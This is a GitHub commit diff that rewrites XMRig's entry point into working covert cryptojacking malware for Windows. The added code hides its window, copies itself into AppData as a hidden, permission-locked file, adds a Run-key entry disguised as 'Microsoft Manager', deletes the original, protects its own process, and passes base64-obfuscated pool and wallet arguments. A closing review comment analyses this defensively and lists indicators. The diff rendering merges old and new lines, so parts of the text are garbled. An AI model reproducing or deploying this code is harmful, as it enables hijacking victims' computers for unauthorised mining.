Fixed modrig and updated it here.

It is now a fully functioning silent XMR miner with base64 encoding.
woah1337 2018-06-25 18:19:17 +05:30 committed by GitHub
parent 25dce61369
commit 1aca0eeb70
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23


@ -1,31 +1,210 @@
/* XMRig #define _UNICODE
* Copyright 2010 Jeff Garzik <jgarzik@pobox.com>
* Copyright 2012-2014 pooler <pooler@litecoinpool.org>
* Copyright 2014 Lucas Jones <https://github.com/lucasjones>
* Copyright 2014-2016 Wolf9466 <https://github.com/OhGodAPet>
* Copyright 2016 Jay D Dee <jayddee246@gmail.com>
* Copyright 2016-2017 XMRig <support@xmrig.com>
*
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "App.h" #include "App.h"
#include <windows.h>
#include <TCHAR.H>
#include <thread>
#include <sddl.h>
#include <stdio.h>
#include <aclapi.h>
#include <stdlib.h>
#include <Shlwapi.h>
#define STRICT
#pragma comment(linker, "/MERGE:.data=.text")
#pragma comment(linker, "/MERGE:.rdata=.text")
#pragma comment(linker, "/SECTION:.text,EWR")
#define STRLEN(x)(sizeof(x) / sizeof(TCHAR) - 1)
int main(int argc, char **argv) { bool SelfDefense()
App app(argc, argv); {
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
SECURITY_ATTRIBUTES sa;
TCHAR * szSD = TEXT("D:P");
return app.exec(); sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = FALSE;
if (!ConvertStringSecurityDescriptorToSecurityDescriptor(szSD, SDDL_REVISION_1, &(sa.lpSecurityDescriptor), NULL))
return FALSE;
if (!SetKernelObjectSecurity(hProcess, DACL_SECURITY_INFORMATION, sa.lpSecurityDescriptor))
return FALSE;
return TRUE;
}
static const std::string base64_chars =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/";
static inline bool is_base64(unsigned char c) {
return (isalnum(c) || (c == '+') || (c == '/'));
}
std::string mov_eax_push_5012(std::string encoded_string) {
int in_len = encoded_string.size();
int i = 0;
int j = 0;
int in_ = 0;
unsigned char char_array_4[4], char_array_3[3];
std::string ret;
while (in_len-- && (encoded_string[in_] != '=') && is_base64(encoded_string[in_])) {
char_array_4[i++] = encoded_string[in_]; in_++;
if (i == 4) {
for (i = 0; i <4; i++)
char_array_4[i] = base64_chars.find(char_array_4[i]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (i = 0; (i < 3); i++)
ret += char_array_3[i];
i = 0;
}
}
if (i) {
for (j = i; j <4; j++)
char_array_4[j] = 0;
for (j = 0; j <4; j++)
char_array_4[j] = base64_chars.find(char_array_4[j]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (j = 0; (j < i - 1); j++) ret += char_array_3[j];
}
return ret;
}
int Delete(TCHAR* path) {
TCHAR DelCom[MAX_PATH + 1];
wsprintfW(DelCom, L"/c timeout -t 2 && del \"%s\"", path);
ShellExecuteW(0, L"open", L"cmd.exe", DelCom, 0, SW_HIDE);
std::exit(0);
}
int Copy(TCHAR* CopyPth, TCHAR* CruPath, TCHAR* Username) {
STARTUPINFO si;
TCHAR CACLS[1024];
TCHAR CACLS2[1024];
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
PROCESS_INFORMATION pi;
memset(&pi, 0, sizeof(pi));
CopyFile(CruPath, CopyPth, true);
SetFileAttributes(CopyPth, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
wsprintfW(CACLS, L"/c CACLS \"%s\" /E /P %s:N", CopyPth, Username); // Protect this fucking file
ShellExecuteW(0, L"open", L"cmd.exe", CACLS, 0, SW_HIDE);
wsprintfW(CACLS2, L"/c Echo Y| CACLS \"%s\" /P %s:R", CopyPth, Username);
ShellExecuteW(0, L"open", L"cmd.exe", CACLS2, 0, SW_HIDE); // End protect, lazy to comment this shit method ;-)
CreateProcess(NULL, CopyPth, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
Delete(CruPath);
}
int CheckMutex() {
WCHAR MUTEX[] = { L"Global\\Mutex01"};
HANDLE hMutex = CreateMutexW(0, 0, MUTEX);
if ((GetLastError() == ERROR_ALREADY_EXISTS) || (GetLastError() == ERROR_ACCESS_DENIED)) {
CloseHandle(hMutex);
std::exit(0);
}
return 0;
}
BOOL IsElevated() {
BOOL fRet = FALSE;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
TOKEN_ELEVATION Elevation;
DWORD cbSize = sizeof(TOKEN_ELEVATION);
if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
fRet = Elevation.TokenIsElevated;
}
}
if (hToken) {
CloseHandle(hToken);
}
return fRet;
}
int AutoRun(TCHAR* path, BOOL Admin) {
HKEY hKey = NULL;
HKEY hKey2 = NULL;
LONG lResult = 0;
if (Admin) { // If user admin, set hidden auto run. I am to lazy for comment this step
lResult = RegOpenKey(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", &hKey2);
if (ERROR_SUCCESS != lResult) {
RegCreateKey(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", &hKey2);
}
RegOpenKey(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", &hKey2);
RegSetValueEx(hKey2, L"Microsoft Manager", 0, REG_SZ, (PBYTE)path, lstrlen(path) * sizeof(TCHAR) + 1);
RegCloseKey(hKey2);
} else { // But if user not admin, set standart method
RegOpenKey(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey);
RegSetValueEx(hKey, L"Microsoft Manager", 0, REG_SZ, (PBYTE)path, lstrlen(path) * sizeof(TCHAR) + 1);
RegCloseKey(hKey);
}
return 0;
}
int CheckPath() {
TCHAR Username[256]; // To protect file
TCHAR AppData[1024 + 1]; // Drop path var
BOOL Admin = IsElevated(); // Admin? true/false
TCHAR CruPath[MAX_PATH + 1]; // Current path var
ExpandEnvironmentStringsW(L"%USERNAME%", Username, 256); // Windows username
ExpandEnvironmentStringsW(L"%APPDATA%\\WMA.exe", AppData, 1024); // Full drop path
GetModuleFileName(NULL, CruPath, STRLEN(CruPath)); // Current file path
if (_tcscmp(CruPath, AppData) != 0) { // Current path is appdata?
AutoRun(AppData, Admin); // If no set autorun
Copy(AppData, CruPath, Username); // And drop file
} else { // Or
CheckMutex(); // Doublerun?
if (SelfDefense()) {} // Fuck user
return 0;
}
}
//If u need id to worker
char* WorkerID() {
DWORD VolumeSerialNumber = 0;
GetVolumeInformation(L"c:\\", NULL, NULL, &VolumeSerialNumber, NULL, NULL, NULL, NULL);
char procID[20];
sprintf(procID, "%d", VolumeSerialNumber);
return procID;
}
int main() {
ShowWindow(GetConsoleWindow(), SW_HIDE); // hide console
CheckPath();
char *frst = new char[mov_eax_push_5012("RmlsbGVlZQ==").length() + 1];
strcpy(frst, mov_eax_push_5012("RmlsbGVlZQ==").c_str());
char *scnd = new char[mov_eax_push_5012("LW8=").length() + 1];
strcpy(scnd, mov_eax_push_5012("LW8=").c_str());
char *mkdjd = new char[mov_eax_push_5012("LXU=").length() + 1];
strcpy(mkdjd, mov_eax_push_5012("LXU=").c_str());
//Pool in base64
char *urejds = new char[mov_eax_push_5012("PASTE HERE").length() + 1];
strcpy(urejds, mov_eax_push_5012("PASTE HERE").c_str());
//Wallet in base64
char *mkwei3 = new char[mov_eax_push_5012("WALLET HERE").length() + 1];
strcpy(mkwei3, mov_eax_push_5012("WALLET HERE").c_str());
static char * dreams[] = { frst, scnd, urejds, mkdjd, mkwei3 };
App FUcker(5, dreams);
return FUcker.exec();
} }
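Review bot: The new `main()` drops the argc/argv interface and, via `CheckPath()`, copies the running binary to `%APPDATA%\WMA.exe`, registers it as "Microsoft Manager" under `HKCU\...\Run` or `HKLM\...\Policies\Explorer\Run`, spawns `cmd.exe` for `CACLS` and a delayed `del` of the original, takes a `Global\Mutex01` mutex and applies a `D:P` DACL to its own process before handing `App` a fixed argv rebuilt from base64 literals — this is dropper and persistence behaviour, not a fix to XMRig, and should not be merged; the correct entry point is the removed one, `int main(int argc, char **argv) { App app(argc, argv); return app.exec(); }`. For anyone assessing a build of this commit, those registry value names, the hidden copy path, the mutex name, the `cmd.exe` child processes and the `/MERGE:.data=.text` / `/SECTION:.text,EWR` linker pragmas are the observable artifacts to alert on. Independently of intent, `WorkerID()` returns a pointer to the stack array `procID`, and `Copy()`, `AutoRun()` and `CheckPath()` are declared `int` yet fall off the end without a `return`, which is undefined behaviour in every path that reaches them; the `Copy()`/`Delete()` chain also never closes the handles in `pi`. The rendered page collapses old and new sides onto shared lines (for example `#include "App.h" #include "App.h"`), so the exact new-side text around the original header cannot be recovered from this view.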